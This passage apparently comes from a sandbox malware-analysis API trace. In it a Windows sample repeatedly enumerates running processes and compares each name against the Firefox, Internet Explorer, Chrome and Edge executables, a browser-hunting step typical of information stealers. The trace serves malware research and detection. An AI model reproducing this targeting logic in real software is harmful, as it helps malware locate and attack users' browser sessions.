th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.514] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.514] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.514] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.515] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.515] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.515] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.515] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.515] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.515] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0185.516] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0185.516] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0185.516] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0185.516] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.516] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0185.516] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0185.516] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0185.516] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0185.516] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.516] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0185.517] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0185.517] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0185.517] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0185.517] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.517] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.517] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.517] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.517] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.517] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.517] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0185.518] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0185.518] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0185.518] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0185.518] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.518] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0185.518] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0185.518] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0185.518] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0185.518] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.518] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0185.519] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0185.519] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0185.519] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0185.519] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.519] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0185.520] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0185.520] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0185.520] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0185.520] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.520] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0185.520] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0185.520] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0185.520] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0185.520] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.520] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0185.521] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0185.521] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0185.521] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0185.521] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.521] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0185.521] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0185.521] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0185.521] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0185.521] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.521] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0185.522] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0185.522] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0185.522] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0185.522] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.522] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0185.522] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0185.522] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0185.522] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0185.522] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.522] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0185.523] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0185.523] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0185.523] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0185.523] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.523] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0185.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0185.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0185.523] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0185.524] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.524] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0185.524] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0185.524] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0185.524] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0185.524] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.524] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0185.525] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0185.525] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0185.525] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0185.525] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.525] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0185.525] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0185.525] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0185.525] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0185.525] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.525] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0185.526] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0185.526] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0185.526] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0185.526] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.526] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0185.526] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0185.526] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0185.526] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0185.527] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.527] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0185.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0185.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0185.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0185.527] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.527] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0185.528] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0185.528] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0185.528] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0185.528] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.528] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0185.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0185.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0185.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0185.528] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.528] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0185.529] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0185.529] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0185.529] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0185.529] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.529] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0185.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0185.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0185.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0185.529] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.529] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0185.530] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0185.530] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0185.530] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0185.530] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.530] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0185.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0185.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0185.530] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.530] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.531] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.531] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.531] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.531] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.531] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0185.531] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0185.531] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0185.532] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0185.532] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.532] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.532] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.532] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.532] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.532] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.532] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0185.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0185.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0185.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0185.533] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.533] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.533] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0185.533] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0185.533] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0185.533] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.533] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.534] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.534] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.534] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.534] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.534] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0185.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0185.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0185.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0185.534] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.534] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0185.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0185.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0185.535] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0185.535] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.535] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.535] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.535] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.535] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.535] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.536] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.536] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.536] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.536] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.536] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.536] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.537] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0185.537] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0185.537] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0185.537] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0185.537] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0185.537] lstrcmpiA 